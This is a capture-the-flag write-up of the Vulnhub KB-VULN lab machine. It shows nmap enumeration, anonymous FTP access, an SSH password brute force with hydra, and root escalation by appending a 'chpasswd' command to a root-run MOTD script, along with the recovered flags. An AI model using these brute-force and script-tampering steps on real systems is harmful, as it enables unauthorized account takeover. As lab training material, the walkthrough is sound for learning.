Vulnhub - KB-VULN

Posted on | In
My writeup on KB-VULN box.

You can find the machine there > KB-VULN

Summary

This machine is an easy one, from source code enumeration we can detect a username and ssh brute force with it. After gaining a low-privilege shell we can exploit motd daemon and change root password. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
 
$ ip=192.168.1.20
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 00:11 EEST
Nmap scan report for kb-server.zte.com.cn (192.168.1.20)
Host is up (0.00017s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:09:6B:FC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
$ nmap -p 21,22,80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 00:11 EEST
Nmap scan report for kb-server.zte.com.cn (192.168.1.20)
Host is up (0.00039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.18
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)
|   256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)
|_  256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: OneSchool — Website by Colorlib

Let’s start the enumeration on port 21 since we have to anonymous allowed, we can see a .bash_history file let’s download it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
 
$ ftp $ip
Connected to 192.168.1.20.
220 (vsFTPd 3.0.3)
Name (192.168.1.20:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 .
drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 ..
-rw-r--r--    1 0        0              54 Aug 22 17:39 .bash_history
226 Directory send OK.
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .bash_history (54 bytes).
226 Transfer complete.

At the time is useless, maybe we can use it later.

1
2
3
4
5
6
7
 
$ cat .bash_history 
exit
ls
cd /etc/update-motd.d/
ls
nano 00-header
exit

Shell as sysadmin

Let’s move on, port 80 source code gives us a username probably system one because i can’t find a way to use it on web.

1
2
3
4
5
6
7
8
9
10
 
$ curl http://$ip/
<!DOCTYPE html>
<html lang="en">
<head>
<title>OneSchool &mdash; Website by Colorlib</title>
<meta charset="utf-8">

...data...

<!-- Username : sysadmin -->

Let’s try to ssh brute force with it, using rockyou.txt. & here we go!

1
2
3
4
5
6
7
8
 
$ hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt $ip ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-14 00:20:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.20:22/
[22][ssh] host: 192.168.1.20   login: sysadmin   password: password1

1
2
3
4
5
6
 
$ ssh sysadmin@$ip
sysadmin@192.168.1.20's password: 

sysadmin@kb-server:~$ whoami;id
sysadmin
uid=1000(sysadmin) gid=1000(sysadmin) groups=1000(sysadmin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

Shell as root

Before we found something interesting from FTP, the /etc/update-motd.d/ & 00-header. MOTD(Message Of The Day daemon) is the welcome message that show to a user upon the terminal login. Modifying the /etc/motd file you can change the welcome message. But for better configuration you can use the scripts located in the /etc/update-motd.d directory.

So we can add a command that change root password and the next time we login, the MOTD will execute it. (MOTD is running as root)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 
sysadmin@kb-server:/etc/update-motd.d$ echo "echo 'root:pwned' | sudo chpasswd" >> 00-header 
sysadmin@kb-server:/etc/update-motd.d$ cat 00-header 
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

echo "\n\t\t\tWELCOME TO THE KB-SERVER\n"
echo 'root:pwned' | sudo chpasswd
sysadmin@kb-server:/etc/update-motd.d$ exit
logout
Connection to 192.168.1.20 closed.

Now we can simply login and root password will change. :fire:

1
2
3
4
5
6
7
8
 
$ ssh sysadmin@$ip                                             
sysadmin@192.168.1.20's password: 

sysadmin@kb-server:~$ su - root
Password: 
root@kb-server:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read the flags.

1
2
3
4
 
root@kb-server:~# cat /home/sysadmin/user.txt 
48a365b4ce1e322a55ae9017f3daf0c0
root@kb-server:~# cat flag.txt 
1eedddf9fff436e6648b5e51cb0d2ec7

For the readers

I think this box has a second privilege escalation way, based on LXD group. You can try it yourself. :wink:

Fun box, i enjoyed this privilege escalation a lot. :smile: